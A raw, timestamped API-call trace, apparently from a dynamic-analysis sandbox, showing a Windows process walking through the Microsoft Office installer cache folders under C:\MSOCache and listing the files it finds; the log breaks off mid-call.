FindNextFileW (in: hFindFile=0x4d7f50, lpFindFileData=0x4d7cf8 | out: lpFindFileData=0x4d7cf8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf58c8770, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf58c8770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-002C-0409-1000-0000000FF1CE}-C", cAlternateFileName="{92787~1")) returned 1 [0070.307] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.307] lstrlenW (lpString="{90140000-002C-0409-1000-0000000FF1CE}-C") returned 40 [0070.307] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf58c8770, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf58c8770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName=".", cAlternateFileName="")) returned 0x4da340 [0070.309] FindNextFileW (in: hFindFile=0x4da340, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf58c8770, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf58c8770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="..", cAlternateFileName="")) returned 1 [0070.309] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.309] FindNextFileW (in: hFindFile=0x4da340, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf07b3a10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf07b3a10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="Proof.en", cAlternateFileName="")) returned 1 [0070.309] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.309] lstrlenW (lpString="Proof.en") returned 8 [0070.309] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*", lpFindFileData=0x4dd498 | out: lpFindFileData=0x4dd498*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf07b3a10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf07b3a10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x75662b50, dwReserved1=0x73694254, cFileName=".", cAlternateFileName="")) returned 0x4c4628 [0070.310] FindNextFileW (in: hFindFile=0x4c4628, lpFindFileData=0x4dd498 | out: lpFindFileData=0x4dd498*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf07b3a10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf07b3a10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x75662b50, dwReserved1=0x73694254, cFileName="..", cAlternateFileName="")) returned 1 [0070.310] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.310] FindNextFileW (in: hFindFile=0x4c4628, lpFindFileData=0x4dd498 | out: lpFindFileData=0x4dd498*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x219b4a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x219b4a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf07b1ad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xaf35ed, dwReserved0=0x75662b50, dwReserved1=0x73694254, cFileName="Proof.cab", cAlternateFileName="")) returned 1 [0070.310] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.310] lstrlenW (lpString="Proof.cab") returned 9 [0070.310] FindClose (in: hFindFile=0x4c4628 | out: hFindFile=0x4c4628) returned 1 [0070.310] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0070.310] FindNextFileW (in: hFindFile=0x4da340, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf4f690d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="Proof.es", cAlternateFileName="")) returned 1 [0070.310] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.310] lstrlenW (lpString="Proof.es") returned 8 [0070.310] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*", lpFindFileData=0x4dd498 | out: lpFindFileData=0x4dd498*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf4f690d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x75662b50, dwReserved1=0x73694254, cFileName=".", cAlternateFileName="")) returned 0x4c4628 [0070.311] FindNextFileW (in: hFindFile=0x4c4628, lpFindFileData=0x4dd498 | out: lpFindFileData=0x4dd498*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf4f690d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x75662b50, dwReserved1=0x73694254, cFileName="..", cAlternateFileName="")) returned 1 [0070.311] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.311] FindNextFileW (in: hFindFile=0x4c4628, lpFindFileData=0x4dd498 | out: lpFindFileData=0x4dd498*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3ba05100, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3ba05100, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd02aea, dwReserved0=0x75662b50, dwReserved1=0x73694254, cFileName="Proof.cab", cAlternateFileName="")) returned 1 [0070.311] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.311] lstrlenW (lpString="Proof.cab") returned 9 [0070.311] FindClose (in: hFindFile=0x4c4628 | out: hFindFile=0x4c4628) returned 1 [0070.311] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0070.311] FindNextFileW (in: hFindFile=0x4da340, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf30772d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf30772d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="Proof.fr", cAlternateFileName="")) returned 1 [0070.311] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.311] lstrlenW (lpString="Proof.fr") returned 8 [0070.311] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*", lpFindFileData=0x4dd498 | out: lpFindFileData=0x4dd498*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf30772d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf30772d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x75662b50, dwReserved1=0x73694254, cFileName=".", cAlternateFileName="")) returned 0x4c4628 [0070.311] FindNextFileW (in: hFindFile=0x4c4628, lpFindFileData=0x4dd498 | out: lpFindFileData=0x4dd498*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf30772d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf30772d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x75662b50, dwReserved1=0x73694254, cFileName="..", cAlternateFileName="")) returned 1 [0070.311] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.311] FindNextFileW (in: hFindFile=0x4c4628, lpFindFileData=0x4dd498 | out: lpFindFileData=0x4dd498*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x35aa7000, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x35aa7000, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf3076b00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1416b54, dwReserved0=0x75662b50, dwReserved1=0x73694254, cFileName="Proof.cab", cAlternateFileName="")) returned 1 [0070.311] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.311] lstrlenW (lpString="Proof.cab") returned 9 [0070.312] FindClose (in: hFindFile=0x4c4628 | out: hFindFile=0x4c4628) returned 1 [0070.312] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0070.312] FindNextFileW (in: hFindFile=0x4da340, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x40650500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x40650500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf0126df0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="Proofing.msi", cAlternateFileName="")) returned 1 [0070.312] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.312] lstrlenW (lpString="Proofing.msi") returned 12 [0070.312] FindClose (in: hFindFile=0x4da340 | out: hFindFile=0x4da340) returned 1 [0070.312] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0070.312] FindNextFileW (in: hFindFile=0x4d7f50, lpFindFileData=0x4d7cf8 | out: lpFindFileData=0x4d7cf8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc3e6570, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc3e6570, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0043-0409-1000-0000000FF1CE}-C", cAlternateFileName="{95310~1")) returned 1 [0070.312] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.312] lstrlenW (lpString="{90140000-0043-0409-1000-0000000FF1CE}-C") returned 40 [0070.312] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc3e6570, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc3e6570, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName=".", cAlternateFileName="")) returned 0x4da340 [0070.314] FindNextFileW (in: hFindFile=0x4da340, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc3e6570, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc3e6570, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="..", cAlternateFileName="")) returned 1 [0070.314] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.314] FindNextFileW (in: hFindFile=0x4da340, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc138cb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd5600, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="Office32MUI.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0070.314] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.314] lstrlenW (lpString="Office32MUI.msi") returned 15 [0070.314] FindClose (in: hFindFile=0x4da340 | out: hFindFile=0x4da340) returned 1 [0070.315] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0070.315] FindNextFileW (in: hFindFile=0x4d7f50, lpFindFileData=0x4d7cf8 | out: lpFindFileData=0x4d7cf8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa13c510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0044-0409-1000-0000000FF1CE}-C", cAlternateFileName="{91454~1")) returned 1 [0070.315] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.315] lstrlenW (lpString="{90140000-0044-0409-1000-0000000FF1CE}-C") returned 40 [0070.315] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa13c510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName=".", cAlternateFileName="")) returned 0x4da340 [0070.317] FindNextFileW (in: hFindFile=0x4da340, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa13c510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="..", cAlternateFileName="")) returned 1 [0070.317] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.317] FindNextFileW (in: hFindFile=0x4da340, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf79111d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1200204, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="InfLR.cab", cAlternateFileName="")) returned 1 [0070.317] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.317] lstrlenW (lpString="InfLR.cab") returned 9 [0070.317] FindClose (in: hFindFile=0x4da340 | out: hFindFile=0x4da340) returned 1 [0070.318] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0070.318] FindNextFileW (in: hFindFile=0x4d7f50, lpFindFileData=0x4d7cf8 | out: lpFindFileData=0x4d7cf8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x43bdc500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0054-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9EA85~1")) returned 1 [0070.318] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.318] lstrlenW (lpString="{90140000-0054-0409-1000-0000000FF1CE}-C") returned 40 [0070.318] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x43bdc500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName=".", cAlternateFileName="")) returned 0x4da340 [0070.318] FindNextFileW (in: hFindFile=0x4da340, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x43bdc500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="..", cAlternateFileName="")) returned 1 [0070.318] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.318] FindNextFileW (in: hFindFile=0x4da340, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f356eb0, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x5f356eb0, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x1861, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0070.318] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.318] lstrlenW (lpString="Setup.xml") returned 9 [0070.318] FindClose (in: hFindFile=0x4da340 | out: hFindFile=0x4da340) returned 1 [0070.319] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0070.319] FindNextFileW (in: hFindFile=0x4d7f50, lpFindFileData=0x4d7cf8 | out: lpFindFileData=0x4d7cf8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf6e0ec10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf6e0ec10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-00A1-0409-1000-0000000FF1CE}-C", cAlternateFileName="{92572~1")) returned 1 [0070.319] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.319] lstrlenW (lpString="{90140000-00A1-0409-1000-0000000FF1CE}-C") returned 40 [0070.319] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf6e0ec10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf6e0ec10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName=".", cAlternateFileName="")) returned 0x4da340 [0070.321] FindNextFileW (in: hFindFile=0x4da340, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf6e0ec10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf6e0ec10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="..", cAlternateFileName="")) returned 1 [0070.321] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.321] FindNextFileW (in: hFindFile=0x4da340, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf5914a30, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263400, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="OneNoteMUI.msi", cAlternateFileName="ONENOT~1.MSI")) returned 1 [0070.321] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.321] lstrlenW (lpString="OneNoteMUI.msi") returned 14 [0070.321] FindClose (in: hFindFile=0x4da340 | out: hFindFile=0x4da340) returned 1 [0070.322] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0070.322] FindNextFileW (in: hFindFile=0x4d7f50, lpFindFileData=0x4d7cf8 | out: lpFindFileData=0x4d7cf8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa5bc90a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc90a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-00B4-0409-1000-0000000FF1CE}-C", cAlternateFileName="{912E0~1")) returned 1 [0070.322] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.322] lstrlenW (lpString="{90140000-00B4-0409-1000-0000000FF1CE}-C") returned 40 [0070.322] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa5bc90a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc90a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName=".", cAlternateFileName="")) returned 0x4da340 [0070.325] FindNextFileW (in: hFindFile=0x4da340, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa5bc90a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc90a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="..", cAlternateFileName="")) returned 1 [0070.325] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.325] FindNextFileW (in: hFindFile=0x4da340, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x308ae9f0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x308ae9f0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5b55ce0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x265400, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="ProjectMUI.msi", cAlternateFileName="PROJEC~1.MSI")) returned 1 [0070.325] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.325] lstrlenW (lpString="ProjectMUI.msi") returned 14 [0070.325] FindClose (in: hFindFile=0x4da340 | out: hFindFile=0x4da340) returned 1 [0070.326] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0070.326] FindNextFileW (in: hFindFile=0x4d7f50, lpFindFileData=0x4d7cf8 | out: lpFindFileData=0x4d7cf8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, 